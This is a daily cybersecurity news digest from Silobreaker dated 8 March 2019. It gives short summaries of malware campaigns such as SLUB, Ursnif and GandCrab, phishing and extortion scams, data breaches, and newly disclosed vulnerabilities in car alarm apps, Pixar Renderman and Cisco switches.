Silobreaker Daily Cyber Digest – 8 March 2019
New SLUB backdoor uses Slack and GitHub as communication channels
- A new backdoor, dubbed SLUB, has been detected in the wild as part of a multi-stage infection process targeting victims with watering hole attacks. The backdoor uses ‘statically-linked curl, boost, and JsonCpp libraries for performing HTTP requests, extracting commands from gist snippets, and parsing Slack channel communication’.
- SLUB includes an exploit for the CVE-2018-8174 remote code execution vulnerability in the Windows VBScript engine, which allows the operators to drop and launch a downloader posing as a DLL file using Powershell. SLUB malware is downloaded in the second stage, and the CVE-2015-1701 flaw in Windows kernel mode drivers is exploited to gain elevated privileges.
- The campaign attempted to extract and collect data from victims, sending this information through Slack, within a specific workspace. In addition, SLUB achieves persistence by adding a Run key to the Windows registry and downloading a Gist snippet, where commands for the malware are stored. The Slack and Github accounts have been disabled.
Ursnif resurges using new techniques to evade detection
- Bromium researchers detected a resurgence of the Ursnif credential-stealing trojan in February.
- Ursnif was delivered via phishing emails with a password-protected zip file attachment containing a Microsoft Word dropper with a VBA AutoOpen macro. Once opened, the document will download the Ursnif executable from a remote server.
- Apart from using password-protected zip files to avoid detection, the malware was also seen using a COM technique that relies on parent-child process relationships.
Source (Includes IOCs)
Hackers use Termite and Earthworm testing tools to create multi-platform botnet
- Termite and Earthworm are packet relay tools developed by Chinese security firm 360Netlab. According to a new report by AT&T Cybersecurity, attackers have weaponized these tools to create a botnet of IoT devices.
- Termite can function as a SOCKS proxy to bounce traffic, as well as a lightweight backdoor to upload and download files, and execute shell commands.
- AT&T discovered Earthworm embedded in an image file on an Android app which communicates with a server in Taiwan previously known to host Xsser malware, and associated with BlackTech. In another instance, Earthworm was found packed with cryptomining malware.
Source (Includes IOCs)
FTC issue warning on increase of Social Security scams
- Scammers have been observed pretending to be employees of Social Security Administrations (SSA), causing losses of $16.6 million in 2018. According to the US Federal Trade Commission, last year there were reportedly 63,000 reports of this type of fraud since January.
- The scammers use this method to get victims to send money through unconventional methods or to obtain information that could be used for identity fraud. The scammers spoof the number of the SSA to appear legitimate and state that the call was prompted by suspicions of crime-related activities, before asking for sensitive details to unblock the victim’s account.
Cybercriminal accidentally attaches legitimate PowerShell instead of malware
- A phishing email has been observed, pretending to be an invoice asking for confirmation of a company account, delivering the executable of a legitimate PowerShell command line utility instead of a malicious payload. The email also included a powershell.exe attachment that was blocked, as a result of all major email services blocking executable files.
- It is believed that the actor behind the email wanted to use a LNK shortcut file for the attack, which is often used to deliver malicious payloads. The shortcut file included PowerShell commands and scripts to run on the victim’s machine.
Egyptian government uses third-party applications against activists
- Amnesty International claimed that the Egyptian government is responsible for a recent wave of spear-phishing attacks aimed at prominent local human rights defenders, the media and civil society organizations’ staff.
- The attacks used a new spear-phishing technique, dubbed OAuth phishing, that involves stealing the OAuth tokens of user’s accounts instead of their account passwords. Victims received emails disguised as legitimate Gmail security alerts that contained a link redirecting them to a page where a third-party app will request access to their account. Once access is granted, the user is redirected to the legitimate security settings page where they can change their password.
- The campaign was also aimed at other email services including Yahoo, Outlook and Hotmail.
GandCrab creators change tactics
- Pinchy Spider, the gang behind GandCrab ransomware, is shifting their tactics in an attempt to control decryption actions against their trademark ransomware. They are recruiting new members to broaden their skillset, whilst spending their time attempting to deploy their malware against lucrative targets, rather than anyone and everyone, in order to maximise their returns. Sophos researchers state that this is occurring alongside their ransomware-as-a-service business.
- Pinchy Spider’s deep and dark web recruitment drive on dark web forums includes hiring for Remote Desktop Protocol, corporate spamming and virtual network computing experts. Described as ‘Big Game Hunting’, Crowdstrike stated that the tactic is not new, but Pinchy Spider has put their own ‘spin’ on it. Individual hosts in a network are being encrypted, each with a different key, and a payment is being demanded on a host by host basis.
Extortion spam campaign leveraging QR code
- Trustwave researchers have observed a new sextortion campaign leveraging QR codes, linking to a Bitcoin payment URL for users to send the extortionist money. The email itself doesn’t contain anything particularly new, telling users that their activities have been monitored, including their webcam, and that they have 48 hours to pay.
Leaks and Breaches
Columbia Surgical Specialists pay ransom following ransomware attack
- The surgical centre in Spokane, Washington, suffered a ransomware attack that impacted up to 400,000 patients. Patients’ names, drivers’ licenses, Social Security numbers and other protected health information may have been compromised.
- The centre confirmed that it paid $14,650 in ransom as several patients, whose data was affected, were scheduled for surgeries and medical staff required access to their records.
Security flaws discovered in three specialist car alarm apps
- According to research by Pen Test Partners, vulnerabilities exist in car alarm apps by Clifford, Viper and Pandora. Exploiting these flaws permits attackers to activate car alarms, unlock a vehicle’s door or start the engine via an insecure app.
- In particular, a password flaw discovered in Pandora car alarm apps allowed the researchers to take control of the smart alarm remote access app, track any vehicle in real time, remotely activate the alarm, open the door locks and start a vehicle’s engine. They were also able to use a legitimate account to access other users’ profiles and alter their passwords to gain full control.
Vulnerabilities discovered in Pixar Renderman
- Researchers at Cisco Talos discovered three local vulnerabilities in the macOS version of Pixar Renderman’s install helper tool. An attacker could exploit these vulnerabilities to gain root privileges on a target system.
- The three vulnerabilities are identified as CVE-2018-4054, an install helper privilege escalation vulnerability, CVE-2018-4055, an arbitrary file read privilege escalation vulnerability, and CVE-2019-5015, a privilege escalation vulnerability.
- Pixar Renderman 22.3.0 and prior are affected by these vulnerabilities, and a patch is now available.
Medical IoT devices vulnerable to hacking
- Check Point has reported that medical IoT devices contain vulnerabilities because they are often built using legacy operating systems and outdated software, Statistics show that 87% of healthcare organisations will have adopted IoT devices by the end of 2019. Researchers believe that outdated, unpatched devices will only increase the attack vectors available to malicious actors.
- In their research, they managed to obtain an ultrasound machine, which turned out to still be running Windows 2000, an operating system with publicly known vulnerabilities, no longer maintained or supported by Microsoft. They were able to easily exploit one of the many vulnerabilities that exist to access the machine’s entire database.
Vulnerabilities patched in Cisco Nexus switches
- Cisco published a security advisory, stating the fixes for vulnerabilities in Cisco Nexus switches. These include CVE-2019-1663, a critical remote command execution vulnerability, CVE-2018-0296, a denial of service vulnerability, and CVE-2019-1618, an arbitrary code execution vulnerability, rated high.
Facebook removes campaigns used to promote discord in UK and Romania
- Facebook has discovered and removed content that was related to two coordinated campaigns dedicated to creating political discord in the UK and Romania. One of the campaigns impersonated activists that represented the far right and the anti-far right to spread misinformation, hate speech and divisive comments on both sides of the UK’s political spectrum.
- In total 137 Facebook and Instagram accounts, pages and groups were removed, including 23 Facebook pages, 74 Facebook accounts, 5 Facebooks groups and 35 Instagram accounts with over 180,000 followers. The campaign also spent $1,500 on advertisements since 2013.
- A similar campaign was also identified based out of Romania, with the purpose of using a combination of fake and authentic accounts to create posts in support of the Social Democratic Party (PSD). This campaign consisted of 4 Facebook pages, 26 Facebook accounts and one Facebook group, and spent approximately $650 on advertising since 2013.
Researchers analyse MuddyWater’s PowerShell backdoor
- Threat Recon Team researchers described how MuddyWater uses a PowerShell to EXE method to carry out their attacks and load scripts past layers of obfuscation. In a blog post by ThreatRecon, the researchers detailed a recent version of the backdoor, including how it creates a ‘victim ID’ and its C&C structure.
Source (Includes IOCs)
Minnesota man pleads guilty to hacking Minnesota government databases
- 20-year-old Cameron Thomas Crowley has admitted to hacking state government databases in 2017, in response to the acquittal of an officer who fatally shot Philando Castile during a 2016 traffic stop. Losses caused by Crowley’s hacking operations reportedly total between $40,000 and $90,000.
- Crowley used the pseudonym ‘Vigilance’ as he attacked government databases, including one that contained identifying information pertaining to hundreds of students and employees at a university. Crowley then posted a link to that information on a well-known hacking website.
- In addition, he also hacked into other databases owned by the Minnesota government, a second university and an unnamed school district.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.